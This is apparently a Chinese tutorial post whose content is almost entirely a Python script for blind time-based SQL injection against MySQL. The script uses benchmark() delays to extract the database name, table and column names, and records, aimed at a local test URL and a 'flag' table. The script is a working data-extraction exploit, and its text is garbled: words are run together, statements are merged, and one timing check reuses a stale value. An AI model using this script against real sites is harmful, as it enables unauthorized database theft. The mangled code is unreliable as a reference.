mysql benchmark 注入_sql注入------基于时间延迟benchmark函数注入脚本

#author:windy_2

importrequests

urlx= 'http://127.0.0.1/?id= 1 and if((substr((select database()),'payloads= 'qwertyuiopasdfghjklzxcvbnm{}_0123456789'

defguess_column(table):

string= ''extend=0

list=[]

length2=0

num=[]

num1=[]

url1= 'http://127.0.0.1/?id= 1 and if(((select count(column_name) from information_schema.columns where table_name=\''+ table + '\')='url2= 'http://127.0.0.1/?id= 1 and if((substr((select column_name from information_schema.columns where table_name=\'' + table + '\' limit'url3= 'http://127.0.0.1/?id= 1 and if(((select length(column_name) from information_schema.columns where table_name=\'' + table + '\' limit'url4= 'http://127.0.0.1/?id= 1 and if(((substr((select'url5= 'http://127.0.0.1/?id= 1 and if(((select count('url7= 'http://127.0.0.1/?id= 1 and if(((select length('

for i in range(50): #获取字段数量

url = url1 + str(i) + '),benchmark(1000000,md5(\'test\')),NULL); %23'r=requests.get(url)print(url)

time=r.elapsed.total_seconds()print(time)if time > 1.5:

extend=i

length2=ibreak

for k inrange(extend):

st= ''extend1=0for m in range(100):

url= url3 + str(k) + ',1)=' + str(m) + '),benchmark(1000000,md5(\'test\')),NULL); %23' #获取字段长度

r =requests.get(url)if time > 1.5:

extend1=mbreak

for i in range(1,extend1+1): #获取字段

for payload inpayloads:

url= url2 + str(k) + ',1),' + str(i) + ',1)=\'' + payload + '\'),benchmark(1000000,md5(\'test\')),NULL); %23'r=requests.get(url)

time=r.elapsed.total_seconds()if time > 1.5:print(url)

st+=payloadbreaklist.append(st)

num1.append(st)

length=0for i in range(1,10000): #获取记录数量

url = url5 + str(num1[0]) + ') from' + table + ')=' + str(i) + '),benchmark(1000000,md5(\'test\')),NULL); %23'

print(url)

r=requests.get(url)

time=r.elapsed.total_seconds()if time > 1.5:

length=ibreak

for column inlist:

str1= ''

for i inrange(length):

length1=0

url6= url4 + str(column) + 'from' + table + 'limit' +str(i)for k in range(100): #获取记录长度

url = url7 + str(column) + ') from'+ table + 'limit' + str(i) + ',1)=' + str(k) + '),benchmark(1000000,md5(\'test\')),NULL); %23'r=requests.get(url)

time=r.elapsed.total_seconds()if time > 1.5:print(url)

length1=kbreak

for n in range(1,length1+1): #获取记录

for payload inpayloads:

url= url6 + ',1),' + str(n) + ',1))=\'' + str(payload) + '\'),benchmark(1000000,md5(\'test\')),NULL); %23'r=requests.get(url)

time=r.elapsed.total_seconds()if time > 1.5:print(url)

str1+=payloadbreaknum.append(str1)

str1= ''

for column innum1:print(column+' ',end='')print('\n',end='')for i inrange(length2):for k inrange(length):

x= i + length *kprint(num[x]+' ',end='')print('\n',end='')defguess_table():

string= ''extend=0

list=[]

url1= 'http://127.0.0.1/?id= 1 and if(((select count(table_name) from information_schema.tables where table_schema=database())='url2= 'http://127.0.0.1/?id= 1 and if((substr((select table_name from information_schema.tables where table_schema=database() limit'url3= 'http://127.0.0.1/?id= 1 and if(((select length(table_name) from information_schema.tables where table_schema=database() limit'

for i in range(50):

url= url1 + str(i) + '),benchmark(1000000,md5(\'test\')),NULL); %23'r=requests.get(url)

time=r.elapsed.total_seconds()if time > 1.5:

extend=ibreak

for k inrange(extend):

st= ''extend1=0for m in range(100):

url= url3 + str(k) + ',1)=' + str(m) + '),benchmark(1000000,md5(\'test\')),NULL); %23'r=requests.get(url)

time=r.elapsed.total_seconds()if time > 1.5:

extend1=mbreak

for i in range(1,extend1+1):for payload inpayloads:

url= url2 + str(k) + ',1),' + str(i) + ',1)=\'' + payload + '\'),benchmark(1000000,md5(\'test\')),NULL); %23'r=requests.get(url)

time=r.elapsed.total_seconds()if time > 1.5:

st+=payloadbreaklist.append(st)print('------------')for i inlist:print(f'[*]{i}')print('------------')

guess_column('flag')defmain():

string= ''url1= 'http://127.0.0.1/?id= 1 and if((length(database())='extend=0for k in range(20):

url= url1 + str(k) + '),benchmark(1000000,md5(\'test\')),NULL); %23'r=requests.get(url)

time=r.elapsed.total_seconds()if time > 1.5:

extend=kbreak

for i in range(1,extend+1):for payload inpayloads:

url= urlx + str(i) + ',1)=\''url= url + payload + '\'),benchmark(1000000,md5(\'test\')),NULL); %23'r=requests.get(url)

time=r.elapsed.total_seconds()if time > 1.5:

string+=payloadbreak

print(f'available database\n[*] {string}')

guess_table()

main()